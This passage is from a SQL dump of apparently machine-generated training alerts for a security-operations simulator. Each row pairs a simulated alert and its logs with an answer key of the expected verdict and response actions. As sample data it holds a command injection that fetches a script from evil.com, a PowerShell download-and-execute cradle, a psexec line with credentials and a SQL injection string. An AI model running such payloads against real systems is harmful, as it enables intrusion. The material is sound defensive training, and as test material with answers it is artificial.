3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER2\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.273Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER2\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(633, 'False Positive: Suspicious Domain Access', 'low', 'SIEM', 'Access to a domain flagged as suspicious, but further analysis shows no malicious activity.', 'Web Request', 'T1071', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T17:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"\",\"hostname\":\"CORP-WORKSTATION4\",\"domain\":\"safedomain.com\"}', '2026-01-11 09:50:46', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"safedomain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Domain is clean and not associated with any known threats\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The domain access was incorrectly flagged as suspicious; no malicious activity was found.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.274Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION4\\\",\\\"domain\\\":\\\"safedomain.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.274Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION4\\\",\\\"domain\\\":\\\"safedomain.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.274Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION4\\\",\\\"domain\\\":\\\"safedomain.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.274Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION4\\\",\\\"domain\\\":\\\"safedomain.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.274Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION4\\\",\\\"domain\\\":\\\"safedomain.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(634, 'Command Injection Attempt Detected', 'critical', 'IDS', 'A command injection attempt was detected targeting a web application.', 'Web Attack', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T18:10:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"10.0.0.10\",\"hostname\":\"WEB-APP1\",\"request_body\":\"id; wget http://evil.com/malware.sh\"}', '2026-01-11 00:35:15', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple command injection attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"id; wget http://evil.com/malware.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"harden_web_server\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request contains a command injection payload, confirming this as a true positive.\"}', 'Novice', 'MAL', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.275Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T18:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"hostname\\\":\\\"WEB-APP1\\\",\\\"request_body\\\":\\\"id; wget http://evil.com/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.275Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T18:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"hostname\\\":\\\"WEB-APP1\\\",\\\"request_body\\\":\\\"id; wget http://evil.com/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.275Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T18:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"hostname\\\":\\\"WEB-APP1\\\",\\\"request_body\\\":\\\"id; wget http://evil.com/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.275Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T18:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"hostname\\\":\\\"WEB-APP1\\\",\\\"request_body\\\":\\\"id; wget http://evil.com/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.275Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T18:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"hostname\\\":\\\"WEB-APP1\\\",\\\"request_body\\\":\\\"id; wget http://evil.com/malware.sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | 
head 100\"}}', 0),
(635, 'Outbound Connection to Known Malicious IP', 'high', 'Firewall', 'An outbound connection was detected to an IP address with known malicious activities.', 'Data Exfiltration', 'T1041', 1, 'investigating', 74, '{\"timestamp\":\"2026-01-11T19:20:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.21\",\"dst_ip\":\"203.0.113.99\",\"hostname\":\"CORP-WORKSTATION5\"}', '2026-01-11 11:18:33', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for data exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.21\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"monitor_traffic\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is known for data exfiltration, confirming this as a true positive.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(636, 'Malware Detected via IPS Signature', 'critical', 'IDS/IPS', 'A known malware signature was detected in network traffic.', 'Malware', 'T1105', 1, 'Closed', 65, '{\"timestamp\":\"2026-01-11T20:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.22\",\"dst_ip\":\"192.168.1.5\",\"hostname\":\"CORP-WORKSTATION6\",\"file_hash\":\"efgh5678abcd1234ijkl9012mnopqrst\"}', '2026-01-11 00:34:12', '2026-02-05 17:01:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"efgh5678abcd1234ijkl9012mnopqrst\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as malware by 70 antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash matches known malware signatures, confirming this as a true positive.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.278Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T20:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.22\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION6\\\",\\\"file_hash\\\":\\\"efgh5678abcd1234ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.278Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T20:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.22\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION6\\\",\\\"file_hash\\\":\\\"efgh5678abcd1234ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.278Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T20:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.22\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION6\\\",\\\"file_hash\\\":\\\"efgh5678abcd1234ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.278Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T20:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.22\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION6\\\",\\\"file_hash\\\":\\\"efgh5678abcd1234ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.278Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T20:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.22\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION6\\\",\\\"file_hash\\\":\\\"efgh5678abcd1234ijkl9012mnopqrst\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(637, 'Suspicious Process Execution Detected', 'high', 'CrowdStrike', 'A potentially malicious process was executed on host WIN-1234ABCD using PowerShell. The command appears to be attempting to download a file from a suspicious external IP.', 'Malware', 'T1059', 1, 'Closed', 126, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.77\",\"username\":\"jdoe\",\"hostname\":\"WIN-1234ABCD\",\"command_line\":\"powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.77/malware.ps1\')\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-10 00:07:42', '2026-02-19 20:43:17', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.77/malware.ps1\')\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to download and execute a malicious script\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1200 times for hosting malware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash identified as malware\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command line execution clearly shows intent to download and execute a malicious script from a known bad IP.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(638, 'Brute Force Attack Detected', 'medium', 'Splunk', 'Multiple failed login attempts were detected from an external IP on the corporate VPN service, suggesting a brute force attack.', 'Brute Force', 'T1078', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"unknown\",\"hostname\":\"VPN-SERVER\",\"failed_attempts\":25}', '2026-01-11 08:27:41', '2026-02-22 14:43:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 450 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the VPN server.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from the same external IP indicates a brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.280Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.280Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.280Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.280Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.280Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(639, 'Phishing Email Detected', 'high', 'Proofpoint', 'A phishing email was received by user jsmith containing a suspicious link purportedly leading to a document download.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T10:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.85\",\"dst_ip\":\"192.168.1.15\",\"username\":\"jsmith\",\"hostname\":\"MAIL-SERVER\",\"email_sender\":\"no-reply@notarealcompany.com\",\"url\":\"http://malicious-link.com/download\"}', '2026-01-11 11:57:34', '2026-02-02 12:11:44', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@notarealcompany.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain not recognized as legitimate business.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL known to host phishing content\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in phishing campaigns\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contained a known malicious URL used in phishing attacks.\"}', 'Beginner', 'NDR', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:22.282Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice 
immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(640, 'SQL Injection Attempt Detected', 'critical', 'Web Application Firewall', 'An SQL injection attempt was detected targeting the login page of the corporate web application.', 'Web Attack', 'T1190', 1, 'Closed', 99, '{\"timestamp\":\"2026-01-11T11:20:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"192.168.1.20\",\"username\":\"n/a\",\"hostname\":\"WEB-SERVER\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-10 09:57:55', '2026-02-16 17:06:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 600 times for SQL injection attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request payload is a classic SQL injection technique.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(641, 'Unauthorized Access Attempt on Admin Account', 'high', 'Wazuh', 'Multiple failed login attempts were detected on an admin account from a foreign IP address. This might indicate an attempt to gain unauthorized access.', 'Brute Force', 'T1078', 1, 'Closed', 225, '{\"timestamp\":\"2026-01-11T07:50:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.112\",\"dst_ip\":\"10.0.0.10\",\"username\":\"admin\",\"hostname\":\"DC-SERVER\",\"failed_attempts\":30}', '2026-01-10 05:59:33', '2026-03-09 02:34:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.112\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted admin account.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The pattern of failed attempts suggests a brute force attack targeting admin credentials.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, 